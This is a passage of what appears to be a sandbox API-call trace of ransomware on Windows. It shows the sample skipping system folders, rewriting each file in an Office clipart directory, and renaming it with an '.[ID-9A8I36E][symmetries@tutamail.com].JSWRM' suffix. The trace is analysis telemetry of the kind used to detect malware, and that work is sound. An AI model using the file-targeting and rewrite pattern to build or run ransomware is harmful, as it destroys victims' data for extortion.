CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0324704.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0324704.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0324704.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0089.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0089.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0324704.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0324704.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0324704.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0089.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0089.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324704.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.509] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11902) returned 1 [0089.509] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2e70) returned 0x24d210 [0089.509] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2e70, lpOverlapped=0x0) returned 1 [0089.512] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.512] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2e70, lpOverlapped=0x0) returned 1 [0089.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.512] CloseHandle (hObject=0x314) returned 1 [0089.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0089.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0089.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0089.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0089.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0089.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.512] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324704.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0324704.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0324704.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0089.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.513] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3260, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0337280.JPG", cAlternateFileName="")) returned 1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2=".") returned 1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="..") returned 1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="...") returned 1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="windows") returned -1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="recovery") returned -1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="perflogs") returned -1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="documents and settings") returned 1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="system volume information") returned -1 [0089.513] lstrcmpiW (lpString1="J0337280.JPG", lpString2="msocache") returned -1 [0089.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0089.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0337280.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0337280.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0337280.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.514] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0089.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0337280.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.514] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0337280.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0337280.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0089.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0337280.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.515] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12896) returned 1 [0089.515] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3260) returned 0x24d210 [0089.515] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3260, lpOverlapped=0x0) returned 1 [0089.518] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.518] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3260, lpOverlapped=0x0) returned 1 [0089.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.518] CloseHandle (hObject=0x314) returned 1 [0089.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.518] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0089.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.518] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0089.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0089.519] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0089.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.519] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0337280.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0337280.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0337280.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.519] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.519] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341328.JPG", cAlternateFileName="")) returned 1 [0089.519] lstrcmpiW (lpString1="J0341328.JPG", lpString2=".") returned 1 [0089.519] lstrcmpiW (lpString1="J0341328.JPG", lpString2="..") returned 1 [0089.519] lstrcmpiW (lpString1="J0341328.JPG", lpString2="...") returned 1 [0089.519] lstrcmpiW (lpString1="J0341328.JPG", lpString2="windows") returned -1 [0089.520] lstrcmpiW (lpString1="J0341328.JPG", lpString2="recovery") returned -1 [0089.520] lstrcmpiW (lpString1="J0341328.JPG", lpString2="perflogs") returned -1 [0089.520] lstrcmpiW (lpString1="J0341328.JPG", lpString2="documents and settings") returned 1 [0089.520] lstrcmpiW (lpString1="J0341328.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.520] lstrcmpiW (lpString1="J0341328.JPG", lpString2="system volume information") returned -1 [0089.520] lstrcmpiW (lpString1="J0341328.JPG", lpString2="msocache") returned -1 [0089.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0089.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341328.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341328.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341328.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0089.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341328.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341328.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341328.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.520] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0089.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.520] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.520] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341328.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.521] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10196) returned 1 [0089.521] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.521] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27d0) returned 0x24d210 [0089.521] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27d0, lpOverlapped=0x0) returned 1 [0089.523] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.524] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27d0, lpOverlapped=0x0) returned 1 [0089.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.524] CloseHandle (hObject=0x314) returned 1 [0089.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0089.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0089.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0089.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0089.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0089.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0089.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.524] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341328.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341328.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341328.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0089.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0089.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.525] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2cdd, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341344.JPG", cAlternateFileName="")) returned 1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2=".") returned 1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="..") returned 1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="...") returned 1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="windows") returned -1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="recovery") returned -1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="perflogs") returned -1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="documents and settings") returned 1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="system volume information") returned -1 [0089.525] lstrcmpiW (lpString1="J0341344.JPG", lpString2="msocache") returned -1 [0089.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0089.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341344.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341344.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341344.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0089.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341344.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341344.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341344.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.526] RtlAllocateHeap (HeapHandle=0x1e0000, 